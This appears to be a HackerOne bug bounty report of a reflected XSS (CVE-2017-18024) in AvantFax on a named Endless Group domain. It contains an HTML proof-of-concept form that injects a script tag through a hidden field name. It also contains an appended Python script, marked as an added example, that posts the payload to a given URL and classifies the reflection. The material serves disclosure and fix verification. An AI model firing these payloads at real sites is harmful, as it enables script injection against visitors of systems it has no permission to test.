hackerone / pirneci / H1:963798
Aug 20, 2020 - 8:56 p.m.

Endless Group: XSS on https://fax.pbx.itsendless.org/ (CVE-2017-18024)

2020-08-20 20:56:16
pirneci
hackerone.com
endless group
xss
avantfax
cve-2017-18024
exploit
post request
vulnerability
impact

EPSS

0.001

Percentile

31.9%

Summary:

Hello Endless Hosting,

I found an XSS on https://fax.pbx.itsendless.org/ . This domain is running AvantFax software 3.3.6.
However, the CVE-2017-18024 exploit for version 3.3.3 works on that version.

Here is the exploit code for CVE-2017-18024 (the PoC page, saved as avantfax.html):

    <html>
      <body>
        <!-- Hide the PoC page's own path in the address bar before the form is submitted -->
        <script>history.pushState('', '', '/')</script>
        <!-- Login POST against the target; the payload sits in the NAME of the last hidden field, not in any value -->
        <form action="https://fax.pbx.itsendless.org/" method="POST">
          <input type="hidden" name="username" value="admin" />
          <input type="hidden" name="password" value="admin" />
          <input type="hidden" name="_submit_check" value="1" />
          <input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

This code sends a POST request to the server and uses a made-up hidden field name to exploit the software's XSS vulnerability.

Steps To Reproduce:

  1. Open avantfax.html, and that's all.
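The same probe as a scripted check, added here as an example; it is not code from the original report and not AvantFax code. It assumes, as the report's form does, that the login is POSTed to the site root with the fields username, password and _submit_check, and that the vulnerable page echoes an unrecognised POST field name back into the HTML unescaped. The sample responses in the script are constructed for illustration, not captured from fax.pbx.itsendless.org, and the reflection_state classifier tells an exploitable raw reflection apart from an entity-encoded (fixed) one, which is the check a triager wants before marking the finding resolved.

```python
"""Scripted version of the report's HTML form PoC, plus a reflection check.

Added example; not code from the original report and not AvantFax code.
Assumptions (not confirmed by the report): the login form is POSTed to the
site root with the four fields the report's form sends, and the vulnerable
page echoes an unrecognised POST field *name* back into the HTML unescaped.
The sample responses below are constructed, not captured from the target.
"""
import html
import re
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request

XSS_TAG = "<script>alert(1)</script>"


def make_marker() -> str:
    # Random token placed around the payload so the check cannot match text
    # already on the page (the report used jlbqg/b7g0x for the same purpose).
    return "h1" + secrets.token_hex(4)


def build_payload(marker: str) -> dict:
    # Same four fields as the report's form. The injection is in the NAME of
    # the fourth field; every value is harmless.
    return {
        "username": "admin",
        "password": "admin",
        "_submit_check": "1",
        f"{marker}{XSS_TAG}{marker}": "1",
    }


def encode_form(fields: dict) -> bytes:
    # application/x-www-form-urlencoded, what a browser form submit sends.
    return urllib.parse.urlencode(fields).encode()


def reflection_state(body: str, marker: str) -> str:
    """Classify how the injected field name came back in the response body.

    'unescaped' - raw <script> tag between the markers: exploitable XSS.
    'escaped'   - tag entity-encoded (&lt;script&gt;): reflected but harmless.
    'absent'    - marker not found: the field name is not echoed at all.
    'other'     - markers present but the tag was altered (filter or WAF).
    """
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body, re.S)
    if not m:
        return "absent"
    between = m.group(1)
    if XSS_TAG in between:
        return "unescaped"
    if html.escape(XSS_TAG) in between:
        return "escaped"
    return "other"


def sample_vulnerable(marker: str) -> str:
    # Constructed response from a page that echoes the field name raw.
    return f"<p>Unknown field: {marker}{XSS_TAG}{marker}</p>"


def sample_fixed(marker: str) -> str:
    # Constructed response from the same page after output encoding.
    return f"<p>Unknown field: {marker}{html.escape(XSS_TAG)}{marker}</p>"


def probe(url: str) -> str:
    # Live check: one POST with the report's fields, result classified as above.
    marker = make_marker()
    req = urllib.request.Request(
        url,
        data=encode_form(build_payload(marker)),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            raw, charset = resp.read(), resp.headers.get_content_charset()
    except urllib.error.HTTPError as e:
        # A 4xx/5xx error page can still reflect the field name, so inspect it too.
        raw, charset = e.read(), e.headers.get_content_charset()
    return reflection_state(raw.decode(charset or "utf-8", "replace"), marker)


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(probe(sys.argv[1]))
    else:
        m = make_marker()
        print("vulnerable sample:", reflection_state(sample_vulnerable(m), m))
        print("fixed sample:     ", reflection_state(sample_fixed(m), m))
```

Run it with the target URL as the only argument to send one POST and print the classification; with no argument it exercises the two constructed sample responses. The markers are regenerated per run so a cached or previously reflected payload cannot produce a false positive.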

Supporting Material/References:

CVE-2017-18024 Detail
https://nvd.nist.gov/vuln/detail/CVE-2017-18024#vulnCurrentDescriptionTitle

Impact

{F957416}

An attacker might be able to inject arbitrary html and script code into the web site. This would alter the appearance and would make it possible to initiate further attacks against site visitors.
